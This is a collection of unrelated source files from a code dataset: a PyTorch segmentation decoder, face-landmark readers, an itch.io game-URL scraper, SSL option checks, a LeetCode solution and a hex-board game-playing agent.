int,\n last_upsample_filters=None,\n dropout=0.0,\n abn_block=ABN,\n ):\n super().__init__()\n\n if not isinstance(decoder_features, list):\n decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]\n\n if last_upsample_filters is None:\n last_upsample_filters = decoder_features[0]\n\n self.encoder_features = feature_maps\n self.decoder_features = decoder_features\n self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])\n\n self.bottlenecks = nn.ModuleList(\n [\n RUnetBottleneckBlock(self.encoder_features[-i - 2] + f, f, num_blocks=runet_blocks[i])\n for i, f in enumerate(reversed(self.decoder_features[:]))\n ]\n )\n\n self.output_filters = decoder_features\n\n self.last_upsample = RUnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)\n\n self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)\n\n def get_decoder(self, layer):\n in_channels = (\n self.encoder_features[layer + 1]\n if layer + 1 == len(self.decoder_features)\n else self.decoder_features[layer + 1]\n )\n return RUnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])\n\n def forward(self, feature_maps):\n\n last_dec_out = feature_maps[-1]\n\n x = last_dec_out\n for idx, bottleneck in enumerate(self.bottlenecks):\n rev_idx = -(idx + 1)\n decoder = self.decoder_stages[rev_idx]\n x = decoder(x)\n x = bottleneck(x, feature_maps[rev_idx - 1])\n\n x = self.last_upsample(x)\n\n f = self.final(x)\n\n return f\n\n\nclass RUnetV2SegmentationModel(nn.Module):\n def __init__(\n self,\n encoder: EncoderModule,\n num_classes: int,\n unet_channels: Union[int, List[int]],\n runet_blocks: List[int] = (1, 1, 1, 1),\n last_upsample_filters=None,\n dropout=0.25,\n abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,\n full_size_mask=True,\n ):\n super().__init__()\n self.encoder = encoder\n\n self.decoder = RUNetDecoderV2(\n feature_maps=encoder.output_filters,\n decoder_features=unet_channels,\n runet_blocks=runet_blocks,\n last_upsample_filters=last_upsample_filters,\n mask_channels=num_classes,\n dropout=dropout,\n abn_block=abn_block,\n )\n\n self.full_size_mask = full_size_mask\n\n def forward(self, x):\n features = self.encoder(x)\n\n # Decode mask\n mask = self.decoder(features)\n\n if self.full_size_mask:\n mask = F.interpolate(mask, size=x.size()[2:], mode=\"bilinear\", align_corners=False)\n\n output = {OUTPUT_MASK_KEY: mask}\n return output\n\n\ndef seresnext50_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[64, 128, 256, 256],\n runet_blocks=[3, 3, 3, 3],\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n\n\ndef hrnet18_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = E.HRNetV2Encoder18(pretrained=pretrained, layers=[1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[64, 128, 256],\n runet_blocks=[3, 3, 3, 3],\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n\n\ndef hrnet34_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = 
E.HRNetV2Encoder34(pretrained=pretrained, layers=[1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[128, 128, 256],\n runet_blocks=[3, 3, 3, 3],\n last_upsample_filters=64,\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n\n\ndef hrnet48_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = E.HRNetV2Encoder48(pretrained=pretrained, layers=[1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[128, 128, 256],\n runet_blocks=[3, 3, 3, 3],\n last_upsample_filters=64,\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n\n\ndef densenet121_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[128, 128, 256],\n runet_blocks=[3, 3, 3, 3],\n last_upsample_filters=64,\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n","sub_path":"inria/models/runet.py","file_name":"runet.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"274042856","text":"import os\nimport numpy as np\nfrom numpy import loadtxt\nfrom PIL import Image\n\n### Different reader for different dataset\nclass SelfReader(object):\n \"\"\"\n self contained\n \"\"\"\n @classmethod\n def read(cls, imgPath):\n imgP = imgPath.strip()\n folder, name = os.path.split(imgP)\n file_name,_ = os.path.splitext(name)\n folder, id_name = os.path.split(folder)\n annP = \"%s/Annotations/%s/%s_face.txt\"%(folder,\n id_name,\n file_name)\n \n ### Load the ground truth of shape\n gtShape = loadtxt(annP, comments=\"#\", \n delimiter=\",\",\n unpack=False)\n gtShape = gtShape.astype(np.float32)\n \n ### Load the image data\n img = Image.open(imgP)\n if 'L' != img.mode.upper():\n img = img.convert(\"L\")\n img = np.asarray(img, dtype=np.float32)\n return img, gtShape\n \n \nclass AFLWReader(object):\n @classmethod\n def read(cls, imgPath):\n imgP = imgPath.strip()\n folder, name = os.path.split(imgP)\n file_name,_ = os.path.splitext(name)\n annP = \"%s/%s.pts\"%(folder, file_name)\n \n ### Load the ground truth of shape\n lines = open(annP, 'r').readlines()\n gtShape = []\n for line in lines:\n line = line.strip()\n if not str.isdigit(line[0]):\n continue\n x, y = line.split()\n gtShape.append((x,y))\n \n gtShape = np.asarray(gtShape, dtype=np.float32)\n \n ### Load the image data\n img = Image.open(imgP)\n if 'L' != img.mode.upper():\n img = img.convert(\"L\")\n img = np.asarray(img, dtype=np.uint8)\n return img, gtShape\n \n \n \n \n \n \n\n \n","sub_path":"dator/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556302243","text":"#itch.io has 2855 pages for Windows games as of 10/24/19: 85,649 games\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport os\nimport csv\n\n# function to take care of downloading file\ndef enable_download_headless(browser,download_dir):\n 
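# headless Chrome blocks downloads by default; the two lines below register\n # the raw send_command endpoint on the driver's remote connection and then\n # issue the DevTools Page.setDownloadBehavior command so files are saved\n # into download_dir\n 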
browser.command_executor._commands[\"send_command\"] = (\"POST\", '/session/$sessionId/chromium/send_command')\n params = {'cmd':'Page.setDownloadBehavior', 'params': {'behavior': 'allow', 'downloadPath': download_dir}}\n browser.execute(\"send_command\", params)\n\n# instantiate a chrome options object so you can set the size and headless preference\n# some of these chrome options might be unnecessary but I just used a boilerplate\n# change the <path_to_download_default_directory> to whatever your default download folder is located\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\nchrome_options.add_argument(\"--window-size=1920x1080\")\nchrome_options.add_argument(\"--disable-notifications\")\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--verbose')\nchrome_options.add_experimental_option(\"prefs\", {\n \"download.default_directory\": \"/Users/esthergoldstein/Downloads\",\n \"download.prompt_for_download\": False,\n \"download.directory_upgrade\": True,\n \"safebrowsing_for_trusted_sources_enabled\": True,\n \"safebrowsing.enabled\": True\n})\n\n\n# initialize driver object and change the <path_to_chrome_driver> depending on your directory where your chromedriver should be\ndriver = webdriver.Chrome(chrome_options=chrome_options, executable_path=\"/Users/esthergoldstein/itchingtofindsomemalware/chromedriver\")\n\n# change the <path_to_place_downloaded_file> to your directory where you would like to place the downloaded file\ndownload_dir = \"/Users/esthergoldstein/itchingtofindsomemalware/\"\n\n# function to handle setting up headless download\nenable_download_headless(driver, download_dir)\nwith open('itch_game_info.csv', mode='a') as game_info_file:\n i = 0\n writer = csv.writer(game_info_file, delimiter=' ', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['Number', 'Name', 'URL'])\n for page in range(1,2856):\n driver.get(\"https://itch.io/games/downloadable/free/platform-windows?page=\"+str(page))\n search_input = driver.find_elements_by_css_selector(\"a[class='title game_link']\")\n for a_tag in search_input:\n i = i + 1\n writer.writerow([i, a_tag.text, a_tag.get_attribute('href')])\n\n\n","sub_path":"itch_urls_windows.py","file_name":"itch_urls_windows.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277111293","text":"import os\nimport ssl\n\nfrom tornado.options import options\n\nfrom blackhole.log import log\n\n\nsslkwargs = {\n 'do_handshake_on_connect': False,\n 'server_side': True,\n 'ssl_version': ssl.PROTOCOL_TLSv1,\n 'keyfile': options.ssl_key,\n 'certfile': options.ssl_cert,\n 'ca_certs': options.ssl_ca_certs_dir,\n 'ciphers': None,\n}\n\n\nclass BlackholeSSLException(Exception):\n \"\"\"A simple Exception class\"\"\"\n pass\n\n\ndef verify_ssl_opts():\n \"\"\"\n Verify our SSL configuration variables are\n correctly set up.\n \"\"\"\n if not options.ssl_key or not options.ssl_cert:\n raise BlackholeSSLException(\"You need to set an SSL certificate and SSL key\")\n if not os.path.exists(options.ssl_cert):\n raise BlackholeSSLException(\"Certificate '%s' does not exist\" % options.ssl_cert)\n if options.ssl_key and not os.path.exists(options.ssl_key):\n raise BlackholeSSLException(\"Keyfile '%s' does not exist\" % 
options.ssl_key)\n","sub_path":"blackhole/ssl_utils.py","file_name":"ssl_utils.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"405398858","text":"class Solution:\n def canPlaceFlowers(self, flowerbed, n):\n \"\"\"\n :type flowerbed: List[int]\n :type n: int\n :rtype: bool\n \"\"\"\n\n goodIdx = []\n\n if len(flowerbed) == 1 and flowerbed[0] == 0:\n return n < 2\n\n for i in range(len(flowerbed)):\n if i == 0:\n if flowerbed[i] == 0 and flowerbed[i + 1] == 0:\n goodIdx.append(0)\n else:\n continue\n elif i == len(flowerbed) - 1:\n if flowerbed[i] == 0 and flowerbed[i - 1] == 0 \\\n and ((goodIdx and goodIdx[-1] < i - 1) or not goodIdx):\n goodIdx.append(i)\n else:\n continue\n elif flowerbed[i] == 0 and flowerbed[i - 1] == 0 and flowerbed[i + 1] == 0:\n if goodIdx and goodIdx[-1] == i - 1:\n continue\n else:\n goodIdx.append(i)\n print(goodIdx)\n return len(goodIdx) >= n\n\n\ns = Solution()\na = [1,0,0,0,1]\nprint(s.canPlaceFlowers(a, 1))","sub_path":"python/605_canPlaceFlower.py","file_name":"605_canPlaceFlower.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"339015417","text":"from typing import Coroutine\nimport team_name.gamestate\nimport copy\nimport random\n\nclass Player:\n def __init__(self, player):\n \"\"\"\n Called once at the beginning of a game to initialise this player.\n Set up an internal representation of the game state.\n\n The parameter player is the string \"upper\" (if the instance will\n play as Upper), or the string \"lower\" (if the instance will play\n as Lower).\n \"\"\"\n self.gamestate = team_name.gamestate.GameState(player)\n \n def action(self):\n \"\"\"\n Called at the beginning of each turn. Based on the current state\n of the game, select an action to play this turn.\n \"\"\"\n # put your code here\n\n action = self.minimax_decision()\n\n return action\n\n def update(self, opponent_action, player_action):\n \"\"\"\n Called at the end of each turn to inform this player of both\n players' chosen actions. 
Update your internal representation\n of the game state.\n The parameter opponent_action is the opponent's chosen action,\n and player_action is this instance's latest chosen action.\n \"\"\"\n self.gamestate.turnnum += 1\n self.gamestate.update(player_action, opponent_action)\n\n # start\n # check whether (r, q) lies outside the board\n def isOutBound(self, r, q) -> bool:\n if q > 4 or q < -4 or r > 4 or r < -4: return True\n if q == -4 and r < 0: return True\n if q == -3 and r < -1: return True\n if q == -2 and r < -2: return True\n if q == -1 and r < -3: return True\n if q == 1 and r > 3: return True\n if q == 2 and r > 2: return True\n if q == 3 and r > 1: return True\n if q == 4 and r > 0:\n return True\n else:\n return False\n\n def find_possible_throw(self,gamestate):\n possible_pos = []\n if gamestate.mythrownum in range(0, 9):\n # lower player: throw from the bottom row upwards\n if gamestate.identity == \"lower\":\n for i in range(0, gamestate.mythrownum + 1):\n for j in range(-4,5):\n if not self.isOutBound(i-4,j):\n possible_pos.append((i - 4, j))\n # upper player: throw from the top row downwards\n elif gamestate.identity == \"upper\":\n for i in range(0, gamestate.mythrownum + 1):\n for j in range(-4,5):\n if not self.isOutBound(4-i,j):\n possible_pos.append((4-i,j))\n return possible_pos\n\n def find_op_possible_throw(self,gamestate):\n possible_pos = []\n if gamestate.opthrownum in range(0, 9):\n # opponent is upper: throws from the top row downwards\n if gamestate.identity == \"lower\":\n for i in range(0, gamestate.opthrownum + 1):\n for j in range(-4,5):\n if not self.isOutBound(4-i,j):\n possible_pos.append((4-i,j))\n # opponent is lower: throws from the bottom row upwards\n elif gamestate.identity == \"upper\":\n for i in range(0, gamestate.opthrownum + 1):\n for j in range(-4,5):\n if not self.isOutBound(i - 4, j):\n possible_pos.append((i - 4, j))\n return possible_pos\n\n def find_possible_slide(self,isopponent,position,type,gamestate):\n possible_pos = []\n final_pos = []\n i = position[0]\n j = position[1]\n for ni, nj in [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1), (i + 1, j - 1), (i - 1, j + 1)]:\n if not self.isOutBound(ni, nj):\n possible_pos.append((ni, nj))\n\n if len(possible_pos) == 6:\n if isopponent:\n tokenlist = list(gamestate.mytokens.values())\n else:\n tokenlist = list(gamestate.optokens.values())\n for token in tokenlist:\n if token.state == False:\n tokenlist.remove(token)\n\n nearest_distance = float('inf')\n nearest_pos = None\n for pos in possible_pos:\n for token in tokenlist:\n if type == \"s\":\n if token.type == \"p\":\n tempDistance = self.cal_distance(pos,token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_pos = pos\n if type == \"p\":\n if token.type == \"r\":\n tempDistance = self.cal_distance(pos,token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_pos = pos\n if type == \"r\":\n if token.type == \"s\":\n tempDistance = self.cal_distance(pos,token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_pos = pos\n if nearest_pos != None:\n final_pos.append(nearest_pos)\n possible_pos.remove(nearest_pos)\n resultList=random.sample(range(0,5),3)\n for i in resultList:\n final_pos.append(possible_pos[i])\n else:\n resultList=random.sample(range(0,6),4)\n for i in resultList:\n final_pos.append(possible_pos[i])\n\n return final_pos\n return possible_pos\n\n def find_possible_swing(self, position, center_pos):\n possible_pos = []\n final_pos = []\n r, q = position\n for center in center_pos:\n i, j = center\n deltaR = r - i\n deltaQ = q - j\n if deltaR == 1 and deltaQ == 0:\n 
possible_pos.append(self.find_pos_by_direction(center, \"rightDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"leftDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"left\"))\n elif deltaR == 0 and deltaQ == 1:\n possible_pos.append(self.find_pos_by_direction(center, \"leftUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"leftDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"left\"))\n elif deltaR == -1 and deltaQ == 1:\n possible_pos.append(self.find_pos_by_direction(center, \"rightUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"leftUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"left\"))\n elif deltaR == -1 and deltaQ == 0:\n possible_pos.append(self.find_pos_by_direction(center, \"leftUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"rightUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"right\"))\n elif deltaR == 0 and deltaQ == -1:\n possible_pos.append(self.find_pos_by_direction(center, \"rightUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"rightDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"right\"))\n elif deltaR == 1 and deltaQ == -1:\n possible_pos.append(self.find_pos_by_direction(center, \"rightDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"leftDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"right\"))\n if len(possible_pos) != 0:\n final_pos.append(random.choice(possible_pos))\n possible_pos = []\n return final_pos\n\n # find the destination cell of a swing from the token's direction relative to the centre token\n def find_pos_by_direction(self, position, direction):\n r, q = position\n if direction == \"right\" and not self.isOutBound(r, q + 1):\n possible_pos = (r, q + 1)\n elif direction == \"rightUp\" and not self.isOutBound(r + 1, q):\n possible_pos = (r + 1, q)\n elif direction == \"rightDown\" and not self.isOutBound(r - 1, q + 1):\n possible_pos = (r - 1, q + 1)\n elif direction == \"left\" and not self.isOutBound(r, q - 1):\n possible_pos = (r, q - 1)\n elif direction == \"leftUp\" and not self.isOutBound(r + 1, q - 1):\n possible_pos = (r + 1, q - 1)\n elif direction == \"leftDown\" and not self.isOutBound(r - 1, q):\n possible_pos = (r - 1, q)\n else:\n return None\n return possible_pos\n\n # if any of my own tokens are adjacent, return swingable=True and their positions\n def is_my_swingable(self, my_position,gamestate):\n \n swingable = False\n center_pos = []\n i = my_position[0]\n j = my_position[1]\n for ni, nj in [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1), (i + 1, j - 1), (i - 1, j + 1)]:\n if not self.isOutBound(ni, nj) and gamestate.my_pos_tokens.get((ni, nj)) != None:\n center_pos.append((ni, nj))\n if len(center_pos) > 0:\n swingable = True\n return swingable, center_pos\n\n def is_op_swingable(self, op_position,gamestate):\n swingable = False\n center_pos = []\n i = op_position[0]\n j = op_position[1]\n for ni, nj in [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1), (i + 1, j - 1), (i - 1, j + 1)]:\n if not self.isOutBound(ni, nj) and gamestate.op_pos_tokens.get((ni, nj)) != None:\n center_pos.append((ni, nj))\n if len(center_pos) > 0:\n swingable = True\n return swingable, center_pos\n\n def preEval(self,actions_list,isopponent,gamestate,flag):\n if gamestate.mythrownum == 0 or gamestate.opthrownum == 0:\n random_action = random.choice(actions_list)\n new_actions_list = [random_action]\n return new_actions_list\n hit_pos = (5,5)\n hit_type = \" \"\n throw_type = \" \"\n if isopponent:\n tokenlist = list(gamestate.mytokens.values())\n for token in tokenlist:\n if 
token.state == False:\n tokenlist.remove(token)\n if gamestate.identity == \"upper\":\n for token in tokenlist:\n if token.position[0] <= -4 + gamestate.opthrownum and token.position[0] <= 0:\n hit_pos = token.position\n hit_type = token.type\n if gamestate.identity == \"lower\":\n for token in tokenlist:\n if token.position[0] >= 4 - gamestate.opthrownum and token.position[0] >= 0:\n hit_pos = token.position\n hit_type = token.type\n if hit_type == \"r\" and gamestate.optokens_p < 3:\n throw_type = \"p\"\n elif hit_type == \"p\" and gamestate.optokens_s < 3:\n throw_type = \"s\"\n elif hit_type == \"s\" and gamestate.optokens_r < 3:\n throw_type = \"r\"\n else:\n tokenlist = list(gamestate.optokens.values())\n for token in tokenlist:\n if token.state == False:\n tokenlist.remove(token)\n if gamestate.identity == \"upper\":\n for token in tokenlist:\n if token.position[0] >= 4 - gamestate.mythrownum and token.position[0] >= 0:\n hit_pos = token.position\n hit_type = token.type\n if gamestate.identity == \"lower\":\n for token in tokenlist:\n if token.position[0] <= -4 + gamestate.mythrownum and token.position[0] <= 0:\n hit_pos = token.position\n hit_type = token.type\n if hit_type == \"r\" and gamestate.mytokens_p < 3:\n throw_type = \"p\"\n elif hit_type == \"p\" and gamestate.mytokens_s < 3:\n throw_type = \"s\"\n elif hit_type == \"s\" and gamestate.mytokens_r < 3:\n throw_type = \"r\"\n \n for action in actions_list:\n if action[0] == \"THROW\" and action[1] == throw_type and action[2] == hit_pos:\n new_actions_list = [action]\n return new_actions_list\n new_actions_list = self.type_unequal(actions_list,isopponent,gamestate,flag)\n new_actions_list = self.find_important_move(new_actions_list,isopponent,gamestate)\n\n return new_actions_list\n\n def find_nearest_pos(self,side1_list,side2_list):\n nearest_distance = float('inf')\n nearest_pos = (5,5)\n for token_1 in side1_list:\n for token_2 in side2_list:\n tempDistance = self.cal_distance(token_1.position,token_2.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_pos = token_1.position\n return nearest_pos\n\n def find_important_move(self,actions_list,isopponent,gamestate):\n my_r = gamestate.mytokens_r\n my_p = gamestate.mytokens_p\n my_s = gamestate.mytokens_s\n op_r = gamestate.optokens_r\n op_p = gamestate.optokens_p\n op_s = gamestate.optokens_s\n \n if (my_r != 0 and op_r != 0 and my_p + my_s + op_p + op_s == 0):\n return actions_list\n if (my_p != 0 and op_p != 0 and my_r + my_s + op_r + op_s == 0):\n return actions_list\n if (my_s != 0 and op_s != 0 and my_p + my_r + op_p + op_r == 0):\n return actions_list\n if (op_s + op_p + op_r == 0) or (my_s + my_p + my_r == 0):\n return actions_list\n \n\n op_r_list = []\n op_p_list = []\n op_s_list = []\n my_r_list = []\n my_p_list = []\n my_s_list = []\n\n optokenlist = list(gamestate.optokens.values())\n for token in optokenlist:\n if token.state == False:\n optokenlist.remove(token)\n mytokenlist = list(gamestate.mytokens.values())\n for token in mytokenlist:\n if token.state == False:\n mytokenlist.remove(token)\n\n for token in optokenlist:\n if token.type == \"r\":\n op_r_list.append(token)\n if token.type == \"s\":\n op_s_list.append(token) \n if token.type == \"p\":\n op_p_list.append(token) \n for token in mytokenlist:\n if token.type == \"r\":\n my_r_list.append(token) \n if token.type == \"s\":\n my_s_list.append(token) \n if token.type == \"p\":\n my_p_list.append(token) \n \n newList = []\n if isopponent:\n if op_r != 0:\n if my_p 
!= 0:\n nearest_pos = self.find_nearest_pos(op_r_list,my_p_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_s != 0:\n nearest_pos = self.find_nearest_pos(op_r_list,my_s_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_p != 0:\n if my_r != 0:\n nearest_pos = self.find_nearest_pos(op_p_list,my_r_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_s != 0:\n nearest_pos = self.find_nearest_pos(op_p_list,my_s_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_s != 0:\n if my_p != 0:\n nearest_pos = self.find_nearest_pos(op_s_list,my_p_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_r != 0:\n nearest_pos = self.find_nearest_pos(op_s_list,my_r_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n else:\n if my_r != 0:\n if op_p != 0:\n nearest_pos = self.find_nearest_pos(my_r_list,op_p_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_s != 0:\n nearest_pos = self.find_nearest_pos(my_r_list,op_s_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_p != 0:\n if op_r != 0:\n nearest_pos = self.find_nearest_pos(my_p_list,op_r_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_s != 0:\n nearest_pos = self.find_nearest_pos(my_p_list,op_s_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_s != 0:\n if op_p != 0:\n nearest_pos = self.find_nearest_pos(my_s_list,op_p_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_r != 0:\n nearest_pos = self.find_nearest_pos(my_s_list,op_r_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n for action in actions_list:\n if action[0] == \"THROW\":\n newList.append(action)\n return list(set(newList))\n \n \n\n\n def type_unequal(self,actions_list,isopponent,gamestate,flag):\n my_r = gamestate.mytokens_r\n my_p = gamestate.mytokens_p\n my_s = gamestate.mytokens_s\n op_r = gamestate.optokens_r\n op_p = gamestate.optokens_p\n op_s = gamestate.optokens_s\n newList = []\n if isopponent:\n if gamestate.opthrownum <= 4:\n \n if my_p > op_s:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"s\",\"p\")\n if near_action != None:\n newList.append(near_action)\n if my_s > op_r:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"r\",\"s\")\n if near_action != None:\n newList.append(near_action)\n if my_r > op_p:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"p\",\"r\")\n if near_action != None:\n newList.append(near_action)\n for action in actions_list:\n if action[0] != \"THROW\":\n newList.append(action)\n return newList\n \n if (op_r == 0 and my_s != 0) or (my_s - op_r > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"r\",\"s\")\n if near_action != None:\n newList.append(near_action)\n if (op_p == 0 and my_r != 0) or (my_r - op_p > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"p\",\"r\")\n if near_action != None:\n newList.append(near_action)\n if (op_s == 0 and my_p != 0) or (my_p - op_s > 1):\n near_action = 
self.find_nearest_action(isopponent,actions_list,gamestate,\"s\",\"p\")\n if near_action != None:\n newList.append(near_action)\n for action in actions_list:\n if action[0] != \"THROW\":\n newList.append(action)\n return newList\n ##our side\n else:\n if gamestate.mythrownum <= 4:\n\n if op_p > my_s:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"s\",\"p\")\n if near_action != None:\n newList.append(near_action)\n if op_s > my_r:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"r\",\"s\")\n if near_action != None:\n newList.append(near_action)\n if op_r > my_p:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"p\",\"r\")\n if near_action != None:\n newList.append(near_action)\n for action in actions_list:\n if action[0] != \"THROW\":\n newList.append(action)\n if flag == 1:\n print(\"op_p: \",op_p,\"op_s: \",op_s,\"op_r: \",op_r,\"my_p: \",my_p,\"my_s: \",my_s,\"my_r: \",my_r)\n return newList\n\n if (my_s == 0 and op_p != 0) or (op_p - my_s > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"s\",\"p\")\n if near_action != None:\n newList.append(near_action)\n if (my_r == 0 and op_s != 0) or (op_s - my_r > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"r\",\"s\")\n if near_action != None:\n newList.append(near_action)\n if (my_p == 0 and op_r != 0) or (op_r - my_p > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"p\",\"r\")\n if near_action != None:\n newList.append(near_action)\n for action in actions_list:\n if action[0] != \"THROW\":\n newList.append(action)\n return newList\n\n\n\n def find_nearest_action(self,isopponent,actions_list,gamestate,type1,type2):\n if isopponent:\n tokenlist = list(gamestate.mytokens.values())\n for token in tokenlist:\n if token.state == False:\n tokenlist.remove(token)\n\n\n nearest_distance = float('inf')\n nearest_action = None\n for token in tokenlist:\n if token.type == type2:\n for action in actions_list:\n if action[1] == type1:\n tempDistance = self.cal_distance(action[2],token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_action = action\n return nearest_action\n \n else:\n tokenlist = list(gamestate.optokens.values())\n for token in tokenlist:\n if token.state == False:\n tokenlist.remove(token)\n\n nearest_distance = float('inf')\n nearest_action = None\n for token in tokenlist:\n if token.type == type2:\n for action in actions_list:\n if action[1] == type1:\n tempDistance = self.cal_distance(action[2],token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_action = action\n return nearest_action\n\n def find_my_possible_actions(self,gamestate,flag):\n actions_list = []\n types = [\"s\", \"r\", \"p\"]\n if gamestate.mythrownum in range(0, 9):\n throw_pos = self.find_possible_throw(gamestate)\n #print(throw_pos)\n for pos in throw_pos:\n for type in types:\n actions_list.append((\"THROW\", type, pos))\n for mytoken in list(gamestate.mytokens.values()):\n # if token is alive\n if mytoken.state:\n slide_position = self.find_possible_slide(False,mytoken.position,mytoken.type,gamestate)\n for pos in slide_position:\n actions_list.append((\"SLIDE\", mytoken.position, pos))\n swingable, center_pos = self.is_my_swingable(mytoken.position,gamestate)\n if swingable:\n swing_position = self.find_possible_swing(mytoken.position, center_pos)\n for pos in swing_position:\n if pos != None:\n 
actions_list.append((\"SWING\", mytoken.position, pos))\n actions_list = self.my_action_cut_off(actions_list,gamestate)\n if gamestate.mythrownum < 9:\n actions_list = self.preEval(actions_list,False,gamestate,flag)\n \n return actions_list\n\n\n def find_op_possible_actions(self,gamestate,flag):\n actions_list = []\n types = [\"s\", \"r\", \"p\"]\n if gamestate.opthrownum in range(0, 9):\n throw_pos = self.find_op_possible_throw(gamestate)\n for pos in throw_pos:\n for type in types:\n actions_list.append((\"THROW\", type, pos))\n for optoken in list(gamestate.optokens.values()):\n # if token is alive\n if optoken.state:\n slide_position = self.find_possible_slide(True,optoken.position,optoken.type,gamestate)\n for pos in slide_position:\n actions_list.append((\"SLIDE\", optoken.position, pos))\n swingable, center_pos = self.is_op_swingable(optoken.position,gamestate)\n if swingable:\n swing_position = self.find_possible_swing(optoken.position, center_pos)\n for pos in swing_position:\n if pos != None:\n actions_list.append((\"SWING\", optoken.position, pos))\n actions_list = self.op_action_cut_off(actions_list,gamestate)\n if gamestate.opthrownum < 9:\n actions_list = self.preEval(actions_list,True,gamestate,flag)\n return 